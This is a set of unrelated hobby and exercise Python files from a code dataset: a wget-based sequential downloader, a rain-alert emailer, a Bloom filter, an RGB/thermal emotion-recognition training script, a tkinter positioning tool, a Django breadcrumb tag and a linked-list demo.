getFinalDirectory():\n\tclear()\n\tprint(\"Please enter the directory you want the files to be downloaded to.\")\n\tprint(\"e.g. '~/webImages/' :\")\n\tnewline(1)\n\tfinalDirectory = input(\">>> \")\n\treturn finalDirectory\n\ndef isWgetInstalled():\n\tclear()\n\twhile os.path.isfile(\"/usr/bin/wget\") != True:\n\t\tprint(\"You need to have wget installed to use this tool.\")\n\t\tprint(\"Would you like to install it? 'Y' or 'N':\")\n\t\tnewline(1)\n\t\tanswer = input(\">>> \").upper()\n\t\tif answer == \"Y\":\n\t\t\tnewline(1)\n\t\t\tos.system(\"sudo apt-get -qq -y install wget\") # Installing wget\n\t\t\tclear()\n\t\t\tprint(\"Wget finished installing!\")\n\t\t\ttime.sleep(2)\n\t\t\tclear()\n\t\t\treturn True\n\t\telif answer == \"N\":\n\t\t\tnewline(1)\n\t\t\tprint(\"Well this tool doesn't work without it.\")\n\t\t\tprint(\"Come back if you change your mind!\")\n\t\t\tnewline(1)\n\t\t\treturn False\n\telse:\n\t\treturn True\n\ndef splitUpUrl(url):\n\tprenumber = \"\"\n\tnumber = \"\"\n\tpostnumber = \"\"\n\tif \"//\" in url:\n\t\tusableUrl = url.replace(\"//\", \"\")\n\telse:\n\t\tusableUrl = url\n\tnumberOfFiles = getFileNumber()\n\tpath = usableUrl[usableUrl.index(\"/\"):]\n\taddress = url.replace(path, \"\")\n\textention = path[path.index(\".\"):]\n\tprint(path)\n\tfor char in reversed(path.replace(extention, \"\")):\n\t\ttry:\n\t\t\tif char == \"/\":\n\t\t\t\tbreak\n\t\t\tint(char)\n\t\t\tnumber += char\n\t\texcept ValueError:\n\t\t\tif number == \"\":\n\t\t\t\tpostnumber += char\n\t\t\telse:\n\t\t\t\tprenumber += char\n\tpostnumber = postnumber[::-1]\n\tnumber = number[::-1]\n\tprenumber = prenumber[::-1]\n\tprint(prenumber+number+postnumber)\n\tstoppingpoint = prenumber+number+postnumber+extention\n\tpath = path[:path.index(stoppingpoint)]\n\treturn address, path, prenumber, number, postnumber, extention, numberOfFiles\n\ndef welcome():\n\tclear()\n\tprint(\"Welcome to the sequential file downloader!\")\n\ttime.sleep(2)\n\n# MAIN PROGRAM HERE\nwelcome()\nif isWgetInstalled() != True:\n\tquit()\nurl = getUrl()\naddress, path, prenumber, number, postnumber, extention, numberOfFiles = splitUpUrl(url)\nfinalDirectory = getFinalDirectory()\ncount = 0\nfor n in range(int(number),(int(number)+numberOfFiles)):\n\tclear()\n\tcount += 1\n\tnewline(1)\n\tprint(\"Downloading file %d of %d\" %(count, numberOfFiles))\n\tnewline(1)\n\tos.system(\"wget \"+address+path+prenumber+str(n)+postnumber+extention+\" -P \"+finalDirectory)\nclear()\nprint(\"All finished!\")\nnewline(1)\ninput(\"Press enter to 
exit...\")\n\nclear()\n","sub_path":"run_me.py","file_name":"run_me.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"308605733","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nimport os\nimport time\nimport json\nimport inspect\nimport logging\nimport smtplib\nimport requests\nimport datetime\n\n\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\n\n\nclass GetUmbrella(object):\n\n def __init__(self):\n filename = inspect.getframeinfo(inspect.currentframe()).filename\n script_path = os.path.dirname(os.path.abspath(filename))\n self.script_path = script_path\n self.config = self.load_config()\n self.blnSend = 0\n self.send_mail(self.parse_conditions(self.get_cities_forecast()))\n\n def load_config(self):\n \"\"\"\n Load configuration from the config.json file.\n\n Returns:\n json object with configuration.\n \"\"\"\n config_file = \"config.json\"\n script_root = self.script_path\n with open(os.path.join(script_root, config_file), \"r\") as ConfigFile:\n return json.load(ConfigFile)\n\n def get_cities_forecast(self):\n \"\"\"\n Retrieve the forecast for several cities\n\n Returns:\n cities_conditions: List with the city list conditions\n \"\"\"\n cities_conditions = []\n for city in self.config[\"openweathermap\"][\"cities\"]:\n cities_conditions.append([city, self.get_forecast(city)])\n return cities_conditions\n\n def parse_conditions(self, lst_conditions):\n \"\"\"\n This will parse the weather conditions and convert it into html to me sent.\n\n Args:\n lst_conditions: List with weather conditions\n\n Returns:\n msg: String with formatted HTML text.\n \"\"\"\n msg = \"Weather conditions for tomorrow. \"\n for iteraction, cities in enumerate(lst_conditions):\n city = lst_conditions[iteraction][0]\n city_conditions = lst_conditions[iteraction][1]\n if len(city_conditions) > 1:\n msg += \" In {} : \".format(city)\n for condition in city_conditions:\n condition_date = condition[0]\n min_tem = condition[1]\n max_temp = condition[2]\n strcondition = condition[3]\n icon = condition[4]\n msg += \"\"\" At {} there will be {} \n with the following temperatures: \n Minimum temperature: {} \n Maximum temperature: {} \n \"\"\".format(condition_date, strcondition, min_tem, max_temp, icon)\n\n return msg\n\n def get_forecast(self, strcity):\n \"\"\"\n This function will get 5 days forecast weather in Barcelona\n to sent through the Bot\n\n Args:\n strcity: String with the city name you want to retrieve the forecast from.\n\n Returns:\n conditions: list with the conditions retrieved\n \"\"\"\n conditions = []\n r = requests.get(\"http://api.openweathermap.org/data/2.5/forecast?q={}&appid={}\".format(strcity, self.config[\"openweathermap\"][\"API_KEY\"])).json()\n umbrella_conditions = (\"heavy rain\", \"light rain\", \"rain\", \"moderate rain\", \"shower rain\", \"thunderstorm\")\n\n for i in range(len(r[\"list\"])):\n min_temp = int(r[\"list\"][i][\"main\"][\"temp_min\"] - 273.15)\n max_temp = int(r[\"list\"][i][\"main\"][\"temp_max\"] - 273.15)\n Date = str(r[\"list\"][i][\"dt_txt\"])\n condition = str(r[\"list\"][i][\"weather\"][0][\"description\"])\n icon = str(r[\"list\"][i][\"weather\"][0][\"icon\"])\n tomorrow = str(datetime.date.today() + datetime.timedelta(days=1))\n\n if Date.split(\" \")[0] == tomorrow:\n if condition in umbrella_conditions:\n self.blnSend = 1\n conditions.append([Date, min_temp, max_temp, condition, icon])\n return conditions\n\n def log(self, strlog):\n \"\"\"\n This function will log every command and msg received by the bot or any\n other info the user 
wants to log on the file.\n\n Args:\n strlog: String with the message or data to want to write on the file.\n\n Returns:\n Nothing.\n \"\"\"\n if self.config['log']:\n FORMAT = '%(levelname)s,%(name)s,%(message)s'\n logging.basicConfig(format=FORMAT, filename=os.path.join(self.script_path, 'LogFile.log'), level=logging.INFO)\n time_now = time.strftime(\"%Y-%m-%d,%H:%M:%S\", time.gmtime())\n logging.info(time_now + \",\" + strlog)\n\n def send_mail(self, strmsg):\n \"\"\"\n Send the mail warning about weather condition\n\n Args:\n strmsg: String with the message to be sent.\n\n Returns:\n Nothing.\n \"\"\"\n if self.blnSend:\n # Email of sender data.\n from_email = self.config[\"emails\"][\"from\"]\n email_passwd = self.config[\"emails\"][\"password\"]\n to_emails = self.config[\"emails\"][\"to\"]\n\n for to_email in to_emails:\n # Compose the email to be sent\n message = MIMEMultipart()\n message['Subject'] = 'Rain Alert!!!'\n message['From'] = from_email\n message['To'] = to_email\n\n # Read image to sent\n for icon in self.config['icons']:\n imageToMail = os.path.normpath(os.path.join(self.script_path, \"icons\", icon+\".png\"))\n with open(imageToMail, 'rb') as fp:\n img = MIMEImage(fp.read())\n img.add_header('Content-ID', '<{}>'.format(icon))\n fp.close()\n message.attach(img)\n # Add text to message\n msgText = MIMEText('{}
'.format(strmsg), 'html')\n message.attach(msgText)\n\n # The actual mail send\n server = smtplib.SMTP(\"smtp.gmail.com:587\")\n server.starttls()\n server.login(from_email, email_passwd)\n server.sendmail(from_email, to_email, str(message))\n\n server.quit()\n self.log(\"Email sent to {} .\".format(to_email))\n else:\n self.log(\"No email sent since there were no conditions to get the umbrella.\")\n\n\n\"\"\"\nExecute the code\n\"\"\"\nUmbrella = GetUmbrella()\n","sub_path":"GetTheUmbrella.py","file_name":"GetTheUmbrella.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"165010373","text":"import uuid\n\nclass StandardBloomFilter:\n \"\"\"\n @param: k: An integer\n \"\"\"\n def __init__(self, k):\n self.size = 500000\n self.bit_array = [0]*self.size\n\n self.hash_funcs = []\n for _ in range(k):\n salt = str(uuid.uuid4())\n self.hash_funcs.append(lambda x: hash(salt+x))\n\n \"\"\"\n @param: word: A string\n @return: nothing\n \"\"\"\n def add(self, word):\n for hash_func in self.hash_funcs:\n index = hash_func(word)%self.size\n self.bit_array[index] = 1\n \n \"\"\"\n @param: word: A string\n @return: True if contains word\n \"\"\"\n def contains(self, word):\n for hash_func in self.hash_funcs:\n index = hash_func(word)%self.size\n if self.bit_array[index] == 0:\n return False\n return True\n\n","sub_path":"src/0556/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"564721765","text":"import time\nimport copy\nimport os\nimport numpy as np\nimport torch.utils.data as data\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch\nimport torch.nn as nn\nfrom sklearn import preprocessing\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport model.vgg_vd_face_fer_dag as vgg_model\nimport model.alexnet_face_fer_bn_dag as alex_model\n\n\n###global_variables\nbatch_size = 4\nnum_epochs = 10\nclasses={\n \"happy\":1,\n \"disgust\":2,\n \"fear\":3,\n \"surprise\":4,\n \"anger\":5,\n \"sadness\":6\n}\nlb = preprocessing.LabelBinarizer()\nlb = lb.fit_transform([1,2,3,4,5,6])\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\nval_df = os.listdir(\"Torch_dataset/Val\")\ntrain_df = os.listdir(\"Torch_dataset/Train\")\n#test_df = os.listdir(\"orch_dataset/Test\")\nprint ('The no of validation and training videos respectively: ')\nprint (len(val_df), len(train_df))\n#len(test_df))\n\nclass KVIEDataset(data.Dataset): \n def __init__(self,fused_image_list=None,phase=None):\n self.phase = phase\n self.fused_image_info = fused_image_list\n self.rgb_mean = torch.tensor([0.70, 0.44, 0.36])\n self.rgb_std = torch.tensor([0.34, 0.37, 0.26])\n self.thermal_mean = torch.tensor([0.34, 0.37, 0.48])\n self.thermal_std = torch.tensor([0.18, 0.17, 0.24])\n self.rgb_mean = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.rgb_mean,0),2),3)\n self.rgb_std = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.rgb_std,0),2),3)\n self.thermal_mean = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.thermal_mean,0),2),3)\n self.thermal_std = torch.unsqueeze(torch.unsqueeze(torch.unsqueeze(self.thermal_std,0),2),3)\n if phase == 'train':\n print (\"No of training videos: \"+str(len(self.fused_image_info)))\n elif phase == 'val':\n print (\"No of validation videos: \"+str(len(self.fused_image_info)))\n else:\n print (\"No of testing videos: \"+str(len(self.fused_image_info)))\n \n def __len__(self):\n return len(self.fused_image_info)\n \n def __getitem__(self, index):\n if self.phase == 'train':\n fused_info = torch.load(\"Torch_dataset/Train/\"+self.fused_image_info[index])\n elif self.phase == 'val':\n fused_info = torch.load(\"Torch_dataset/Val/\"+self.fused_image_info[index])\n else:\n fused_info = torch.load(\"Torch_dataset/Test/\"+self.fused_image_info[index])\n rgb_images = fused_info['rgb']\n thermal_images = fused_info['thm']\n rgb_images = rgb_images.to(dtype=torch.float32)\n #print (rgb_images.shape)\n thermal_images = thermal_images.to(dtype=torch.float)\n rgb_images = rgb_images/255.0\n thermal_images = thermal_images/255.0\n rgb_images = (rgb_images - self.rgb_mean)/(self.rgb_std)\n thermal_images = (thermal_images - self.thermal_mean)/(self.thermal_std)\n label = fused_info['lbl']\n return rgb_images, thermal_images, label\n\ntrain_dataset = KVIEDataset(fused_image_list = train_df, phase=\"train\")\nval_dataset = KVIEDataset(fused_image_list = val_df, phase=\"val\")\n\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, num_workers=4)\nval_loader = torch.utils.data.DataLoader(dataset=val_dataset, batch_size=batch_size, shuffle=True, num_workers=4)\n\ndataloaders = {}\ndataloaders['train'] = train_loader\ndataloaders['val'] = val_loader\ndataset_sizes = {}\ndataset_sizes['train'] = len(train_loader.dataset)\ndataset_sizes['val'] = len(val_loader.dataset)\n\n\n## Loading thermal and 
visible models\ndef vgg_vd_face_fer_dag(weights_path=None, **kwargs):\n \"\"\"\n load imported model instance\n\n Args:\n weights_path (str): If set, loads model weights from the given path\n \"\"\"\n model = vgg_model.Vgg_vd_face_fer_dag()\n if weights_path:\n state_dict = torch.load(weights_path)\n model.load_state_dict(state_dict)\n return model\n \ndef alexnet_face_fer_bn_dag(weights_path=None, **kwargs):\n \"\"\"\n load imported model instance\n\n Args:\n weights_path (str): If set, loads model weights from the given path\n \"\"\"\n model = alex_model.Alexnet_face_fer_bn_dag()\n if weights_path:\n state_dict = torch.load(weights_path)\n model.load_state_dict(state_dict)\n return model\n\nclass Conv_LSTM(nn.Module):\n\n def __init__(self, num_classes, input_size, hidden_size, num_layers, bidirectional):\n super(Conv_LSTM, self).__init__()\n \n self.num_classes = num_classes\n self.num_layers = num_layers\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.bidirectional = bidirectional\n #self.seq_length = seq_length\n self.dropout = nn.Dropout(p=0.2)\n \n self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size, num_layers=num_layers, batch_first=True, bidirectional = self.bidirectional)\n \n #self.fc = nn.Linear(hidden_size, num_classes)\n\n def forward(self, x):\n if self.bidirectional == False:\n h_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n c_0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n else:\n h_0 = torch.zeros(self.num_layers*2, x.size(0), self.hidden_size).to(device)\n c_0 = torch.zeros(self.num_layers*2, x.size(0), self.hidden_size).to(device)\n \n # Propagate input through LSTM\n out, (h_out, _) = self.lstm(x, (h_0, c_0))\n \n #h_out = h_out.view(-1, self.hidden_size)\n \n #out = self.fc(h_out)\n #out = self.dropout(out)\n #print (out.shape)\n if self.hidden_size == 6:\n return self.dropout(h_out)\n else:\n return self.dropout(out)\n\ndef lstm(num_classes,input_size,hidden_size,num_layers,bidirectional):\n model = Conv_LSTM(num_classes,input_size,hidden_size,num_layers,bidirectional)\n return model\n\n\ndef init_weights(m):\n if type(m) == nn.LSTM:\n nn.init.orthogonal_(m.weight_ih_l0, gain=10*nn.init.calculate_gain('tanh'))\n nn.init.orthogonal_(m.weight_hh_l0, gain=10*nn.init.calculate_gain('tanh'))\n if type(m) == nn.Linear:\n nn.init.xavier_normal_(m.weight, gain=nn.init.calculate_gain('relu'))\n nn.init.constant_(m.bias, 0.0)\n \nclass desc(nn.Module):\n\tdef __init__(self):\n\t\tcounter_rgb,counter_thermal = 0,0\n\t\tsuper(desc, self).__init__()\n\t\tself.rgb_model = alexnet_face_fer_bn_dag(weights_path=\"pretrained_model/alexnet_face_fer_bn_dag.pth\")\n\t\tself.thermal_model = vgg_vd_face_fer_dag(weights_path=\"pretrained_model/vgg_vd_face_fer_dag.pth\")\n\t\tfor params in self.rgb_model.parameters():\n\t\t\tcounter_rgb +=1\n\t\t\t#print (params.shape)\n\t\t\tif counter_rgb <= 26:\n\t\t\t\t#print (params)\n\t\t\t\tparams.requires_grad = False\n\t\tfor params in self.thermal_model.parameters():\n\t\t\t#print (params.shape)\n\t\t\tcounter_thermal +=1\n\t\t\tif counter_thermal <= 2:\n\t\t\t\t#print (params)\n\t\t\t\tparams.requires_grad = False\n\t\tprint (counter_rgb, counter_thermal)\n\t\tself.fc1 = nn.Sequential(nn.Linear(24, 6, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#nn.ReLU(inplace=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#nn.Dropout(0.5,inplace=False),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#nn.Linear(64,6, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Sigmoid())\n\t\t'''self.fc2 = 
nn.Sequential(nn.Linear(8192, 512, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.ReLU(inplace=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Linear(512,6, bias=True),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Sigmoid())'''\n\t\tprint (self.rgb_model)\n\t\tprint (self.thermal_model)\n\t\tself.rnn_model_rgb_ini = lstm(num_classes = 6, input_size = 4096, hidden_size = 512, num_layers=1, bidirectional = True)\n\t\tself.rnn_model_rgb_final = lstm(num_classes = 6, input_size = 1024, hidden_size = 6, num_layers=1, bidirectional = True)\n\t\tself.rnn_model_thermal_ini = lstm(num_classes = 6, input_size = 4096, hidden_size = 512 , num_layers=1, bidirectional = True)\n\t\tself.rnn_model_thermal_final = lstm(num_classes = 6, input_size = 1024, hidden_size = 6, num_layers=1, bidirectional = True)\n\t\tprint (self.rnn_model_rgb_ini)\n\t\t#self.rnn_model_rgb.apply(init_weights)\n\t\t#self.rnn_model_thermal.apply(init_weights)\n\t\t#self.fc2.apply(init_weights)\n\t\tself.fc1.apply(init_weights)\n\n\tdef forward(self, thermal_img, rgb_img):\n\t\tthermal_features = self.thermal_model(thermal_img)\n\t\trgb_features = self.rgb_model(rgb_img)\n\t\trgb_lstm_input = rgb_features.view(4,15,4096)\n\t\tthermal_lstm_input = thermal_features.view(4,15,4096)\n\t\trnn_out_rgb_1 = self.rnn_model_rgb_ini(rgb_lstm_input)\n\t\trnn_out_rgb_2 = self.rnn_model_rgb_final(rnn_out_rgb_1)\n\t\trnn_out_thm_1 = self.rnn_model_thermal_ini(thermal_lstm_input)\n\t\trnn_out_thm_2 = self.rnn_model_thermal_final(rnn_out_thm_1)\n\t\t#print (rnn_out_1.shape, rnn_out_2.shape)\n\t\tcombined_features = torch.cat((rnn_out_rgb_2,rnn_out_thm_2), dim =2)\n\t\t#print (combined_features.shape)\n\t\t#print (combined_features[1,0],combined_features[1,1])\n\t\t#lstm_input = combined_features.view(4,15,8192)\n\t\t#print (lstm_input[0,1,0],lstm_input[0,1,1])\n\t\t#rnn_out_1 = self.rnn_model_ini(lstm_input)\n\t\t#rnn_out_2 = self.rnn_model_final(rnn_out_1)\n\t\t#print (rnn_out_2.shape)\n\t\timg = torch.transpose(combined_features, 0, 1)\n\t\timg = torch.flatten(img, start_dim=1)\n\t\t#print (img.shape)\n\t\timg = self.fc1(img)\n\t\treturn img\n\t\t\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\ntorch.cuda.empty_cache()\nmodel_ft = desc()\n\nmodel_ft = model_ft.to(device)\n\n\ncriterion = nn.CrossEntropyLoss()\n\n# Observe that all parameters are being optimized\noptimizer_ft = optim.Adam(filter(lambda p: p.requires_grad, model_ft.parameters()), lr=0.000001)\n\n# Decay LR by a factor of 0.1 every 7 epochs\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=15, gamma=0.5)\n\n\ndef train_model(model, criterion, optimizer, scheduler, batch_size, num_epochs, writer, sequence_length):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n #since = time.time()\n batch_counter = 0\n for thermal_inputs,rgb_inputs,labels in dataloaders[phase]:\n batch_counter +=1\n thermal_inputs = thermal_inputs.to(device)\n rgb_inputs = rgb_inputs.to(device)\n if (list(thermal_inputs.shape) == [batch_size,sequence_length,3,224,224]) and (list(rgb_inputs.shape) == [batch_size,sequence_length,3,224,224]):\n thermal_inputs 
= torch.reshape(thermal_inputs,(batch_size*sequence_length,3,224,224))\n rgb_inputs = torch.reshape(rgb_inputs,(batch_size*sequence_length,3,224,224))\n labels = labels.to(device)\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(thermal_inputs, rgb_inputs)\n #print (outputs)\n _, y_pred_tags = torch.max(outputs, dim = 1)\n loss = criterion(outputs, torch.max(labels, 1)[1])\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n \n \n \n # statistics\n running_loss += loss.item()\n running_corrects += torch.sum(y_pred_tags == torch.max(labels, 1)[1])\n #print (running_corrects)\n #break;\n #break;\n if phase == 'train':\n scheduler.step()\n \n\n epoch_loss = running_loss\n epoch_acc = running_corrects / dataset_sizes[phase]\n writer.add_scalar('Loss/'+phase, epoch_loss, epoch)\n # print(loss.item())\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'val' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n print()\n #break;\n #break;\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n \nwriter = SummaryWriter(log_dir = \"Stats/Fusion3\")\nmodel = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler, batch_size, num_epochs, writer, 15)\n###optional\n'''torch.save({'epoch': 10,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer_ft.state_dict(),\n }, \"data/models/fusion_approach2.pth\")'''","sub_path":"fusion_approach3.py","file_name":"fusion_approach3.py","file_ext":"py","file_size_in_byte":13418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"118534014","text":"import tkinter as tk\nimport time\nimport pygame\nfrom pygame.locals import *\nfrom threading import Thread\nimport win32api,win32con\nfrom tkinter import messagebox #引入弹窗库\n\nscreen_x = win32api.GetSystemMetrics(win32con.SM_CXSCREEN) #获得屏幕分辨率X轴\nscreen_y = win32api.GetSystemMetrics(win32con.SM_CYSCREEN) #获得屏幕分辨率Y轴\n\n\ndef on_closing():\n global moni_window\n if moni_window:\n moni_window.destroy()\n moni_window = None\n\nmoni_window = tk.Tk() #只有一个Tk窗口\n# moni_window = tk.Toplevel() #已有Tk窗口使用Toplevel\nmoni_window.title('弹窗位置设定工具')\n# moni_window.geometry(\"324x300\")\nmoni_window.geometry(str(screen_x)+\"x\"+str(screen_y))\nmoni_window.protocol('WM_DELETE_WINDOW',on_closing)\nmoni_window.attributes(\"-alpha\", 0.6)\n#设置窗口大小不可改变\nmoni_window.resizable(False, False)\n\ndef callback():\n tk_label_y = 30\n # 注意设置坐标的时候是换算后的\n # rate = get_rate() # 获取缩放比例\n # x = int(moni_window.winfo_x()/rate)\n # y = int((moni_window.winfo_y()+tk_label_y)/rate)\n # set_win_location(x,y)\n global moni_window\n if moni_window:\n moni_window.destroy()\n moni_window = None\n\n\n# x,y = get_win_location()\n\n# if x is not None and y is not None:\n# rate = get_rate() # 获取缩放比例\n# x = int(x*rate)\n# y = int(y*rate)\n# moni_window.geometry(\"+\"+str(x)+\"+\"+str(y))\n\n# moni_background = tk.PhotoImage(file=\"moni_bg.png\")\nframe = tk.Frame(moni_window, bg=\"yellow\",cursor=\"crosshair\")\nframe.pack()\n# tip_text = \"如果你想设定pygame弹窗位置\\n可以拖动这个窗口,并点击确认\\n如果无需调整,可点击取消\"\n# text=tip_text,\nmoni_background = tk.PhotoImage(file=r\"res\\moni_bg_test.png\")\nok_png = tk.PhotoImage(file=r\"res\\ok.png\")\ncancel_png = tk.PhotoImage(file=r\"res\\cancel.png\")\nflower_jpg = tk.PhotoImage(file=r\"res\\flower.jpg\")\npos_png = tk.PhotoImage(file=r\"res\\pos.gif\")\ncursor_png = tk.PhotoImage(file=r\"res\\cursor.png\")\n\ntip_label = tk.Label(frame,image=flower_jpg,compound = tk.CENTER,font=(\"Microsoft YaHei\",13),fg='black', justify=\"left\", width=screen_x, height=screen_y, wraplength=300)\ntip_label.pack()\n\n\n\n# ok_png = tk.PhotoImage(file=\"ok.png\")\n# ok_btn = tk.Button(frame, image=ok_png, bg=\"#fdfdbc\", activebackground=\"#fdfdbc\", bd=0, cursor=\"hand2\", compound = tk.CENTER,command=callback, width=86, height=42)\n# ok_btn.place(relx=0.2, rely=0.7) #注意为了保持按钮的对称,ok_btn和cancel_btn的relx之和必须为0.735, ok_btn的relx小于0.23\n\n\n# cancel_btn = tk.Button(frame, image=cancel_png, bg=\"#fdfdbc\",activebackground=\"#fdfdbc\", bd=0, cursor=\"hand2\",compound = tk.CENTER,command=on_closing, width=86, height=42)\n# cancel_btn.place(relx=0.535, rely=0.7)\n\nx = 0\ny = 0\ndef locate(event):\n print(event.x)\n print(event.y)\n global frame\n show_click_pos(frame, event.x, event.y)\n res = messagebox.askokcancel(title='定位确认',message='您是否确认定位在这里?')\n if res == True:\n #Todo: 这里应该有一个在刚才点击位置\n pass\n global moni_window\n if moni_window:\n moni_window.destroy()\n moni_window = None\n print(res) # return ok)\n# print(event.x,event.y)\n# global moni_window\n# global x\n# global y\n# x,y = event.x, event.y\n# moni_window.geometry(\"324x300\"+\"+\"+str(x)+\"+\"+str(y))\n # if event.type==pygame.MOUSEMOTION:\n # x, y = event.pos 直接获取鼠标的坐标\n# pygame.mouse.set_visible(False)\n\n \n\nmoni_window.bind(\"\",locate)\n# moni_window.attributes(\"-fullscreen\", True)\n\ndef show_click_pos(frame, x, y):\n# pos_label = tk.Label(frame,image=pos_png,compound = tk.CENTER,font=(\"Microsoft YaHei\",13),fg='black',justify=\"left\", wraplength=300)\n# pos_label.pack()\n # import matplotlib\n # from matplotlib import pyplot as plt\n 
# from PIL import Image\n # img = Image.open(\"pos.jpg\")\n # fig = plt.figure()\n \n # fig.canvas.manager.window.wm_geometry(\"+\"+str(x)+\"+\"+str(y))\n # fig.imshow(img)\n # fig.figimage(img)\n # plt.show()\n # fig.show()\n\n print(\"show_click_pos finish\")\n\ndef get_full_pos():\n import pyautogui\n try:\n while True:\n x, y = pyautogui.position()\n x -= 100\n y -= 100\n # global moni_window\n # moni_window.geometry(\"324x300\"+\"+\"+str(x)+\"+\"+str(y))\n # print(x,y)\n time.sleep(0.1)\n except KeyboardInterrupt:\n print('\\nExit.')\n\nThread(target=get_full_pos, daemon=True).start()\nmoni_window.mainloop()\n","sub_path":"window_demo.py","file_name":"window_demo.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"179906392","text":"from django import template\n\nregister = template.Library()\n\n@register.assignment_tag\ndef get_breadcrumb(url):\n\tval = [(\"/\", \"Inicio\")]\n\tu = url.split(\"/\")\n\tu.remove(\"\")\n\tu.remove(\"\")\n\tfor i, v in enumerate(u, start=1):\n\t\tval.append((\"/%s/\" % \"/\".join(u[:i]), v.replace(\"-\", \" \").title()))\n\treturn val\n","sub_path":"utils/templatetags/breadcrumb.py","file_name":"breadcrumb.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"619036885","text":"#!/usr/bin/env python\nimport gc\n\nclass Node(object):\n\n def __init__(self, data = None, next = None):\n self.data = data\n self.next = next\n\n def __str__(self):\n return str(self.data)\n\n def __del__(self):\n pass\n\n def getData(self):\n return self.data\n\n def setData(self, data):\n self.data = data\n\n def getNext(self):\n return self.next\n\n def setNext(self, next):\n self.next = next\n\n\n\nclass LinkedList(object):\n\n def __init__(self):\n self.head = None\n\n def __del__(self):\n self.EmptyList()\n\n def isEmpty(self):\n return self.head == None\n\n # Insert a node at head of list\n def InsertAtHead(self, data):\n new_node = Node(data)\n new_node.setNext(self.head)\n self.head = new_node\n\n def InsertAtTail(self, data):\n current = self.head\n\n new_node = Node(data)\n # If list empty set new node as head\n if (not self.head):\n self.head = new_node\n # Find the tail\n else:\n while current.getNext():\n current = current.getNext()\n current.setNext(new_node )\n\n def DeleteNode(self, data):\n current = self.head\n\n while current.next.data != data:\n current = current.getNext()\n current.next = current.next.next\n\n\n\n def EmptyList(self):\n print(\"Starting empty list\")\n if (self.head):\n current = self.head\n while (current):\n self.head = current.getNext()\n del current\n current = self.head\n return 'List now empty'\n\n # Compute the number of nodes in the list\n def size(self):\n current = self.head\n count = 0\n while current:\n count += 1\n current = current.next\n return count\n\n def search(self, data):\n pass\n\n def printList(self):\n current = self.head\n while current:\n print(current.data)\n current = current.getNext()\n\nprint('-- Create list and add \\'1\\'--')\nList = LinkedList()\nList.InsertAtTail('1')\nList.printList()\nprint('-- Insert \\'A\\' & \\'B\\'-----------')\nList.InsertAtHead('A')\nList.InsertAtHead('B')\nList.printList()\nprint('-- Insert \\'C\\'-----------')\nList.InsertAtTail('C')\nList.printList()\nprint('-- Delete \\'A\\'-----------')\nList.DeleteNode('A')\nList.printList()\nprint('-- Empty the list -----------')\nList.EmptyList()\nprint('Size: ', List.size())\nList.printList()\n\n# Force garbage collection\n#gc.collect()\noldcounts = gc.get_count()\n#del List\ngc.collect()\nnewcounts = gc.get_count()\nprint(oldcounts, 